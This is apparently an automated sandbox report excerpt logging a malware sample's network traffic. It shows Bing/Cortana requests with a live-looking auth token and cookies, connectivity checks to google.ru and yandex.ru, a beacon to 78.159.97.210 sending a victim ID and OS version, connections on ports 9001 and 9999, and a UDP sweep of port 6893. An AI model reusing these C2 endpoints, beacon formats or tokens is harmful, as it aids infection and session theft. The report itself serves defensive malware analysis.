MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 92374Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
          Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061295966656129X-DeviceID: 0100748C09004E33X-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3DX-Agent-DeviceId: 0100748C09004E33X-BM-CBT: 1660685844X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 88828Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1664488707263&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CAFE605AAF964660B8479EEA5D4FD3FE&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=E6EAEF30D7E9C145923C068AFFFFFFFF; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=C9vZDDi53VxcYaUEaKZJVHqVGblx/XyLVpZgtY1YUcQS86qd; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
          Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4702Host: login.live.com
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /sw/l.php?aff_id=1&wm_id=46&u=4d79e664-726f-48c9-9669-374112d48b6d&log_id=16&os=6.2.9200.256.1.9. HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.159.97.210Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /sw/l.php?aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&log_id=12&os=10.0.17134.256.1.9. HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.159.97.210Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /fbee4e28-f13c-4918-a85-85d5315c23f HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficTCP traffic: 192.168.2.3:49802 -> 5.255.255.80:139
          Source: global trafficTCP traffic: 192.168.2.3:49816 -> 37.187.79.168:139
          Source: global trafficTCP traffic: 192.168.2.3:49822 -> 140.82.121.4:139
          Source: global trafficTCP traffic: 192.168.2.3:49825 -> 40.126.32.136:139
          Source: global trafficTCP traffic: 192.168.2.3:49843 -> 76.73.17.194:9090
          Source: global trafficTCP traffic: 192.168.2.3:49844 -> 200.87.164.69:9999
          Source: global trafficTCP traffic: 192.168.2.3:49856 -> 200.119.204.12:9999
          Source: global trafficTCP traffic: 192.168.2.3:49858 -> 81.16.19.39:9001
          Source: global trafficTCP traffic: 192.168.2.3:49861 -> 190.211.254.210:9001
          Source: global trafficTCP traffic: 192.168.2.3:49882 -> 190.186.45.170:9999
          Source: global trafficTCP traffic: 192.168.2.3:49915 -> 65.109.16.187:9002
          Source: global trafficTCP traffic: 192.168.2.3:49920 -> 164.132.75.248:9001
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.4:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.5:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.6:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.1:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.0:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.7:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.9:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.8:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.3:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.11:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.14:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.10:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.16:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.15:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.17:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.12:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.18:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.2:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.13:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.19:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.20:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.21:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.22:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.23:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.24:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.25:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.26:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.27:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.28:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.29:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.30:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 93.107.12.31:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.0:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.1:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.2:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.3:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.4:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.5:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.6:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.7:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.8:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.9:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.10:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.11:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.12:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.13:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.14:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.15:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.16:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.17:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.18:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.19:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.20:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.21:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.22:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.23:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.24:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.25:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.26:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.27:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.28:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.29:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.30:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 95.1.200.31:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.0:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.1:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.2:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.3:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.4:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.5:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.6:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.7:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.8:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.9:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.10:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.11:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.12:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.13:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.14:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.15:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.16:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.17:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.18:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.19:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.20:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.21:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.22:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.23:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.24:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.25:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.26:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.27:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.28:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.29:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.30:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.31:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.32:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.33:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.34:6893
          Source: global trafficUDP traffic: 192.168.2.3:55639 -> 87.98.176.35:6893
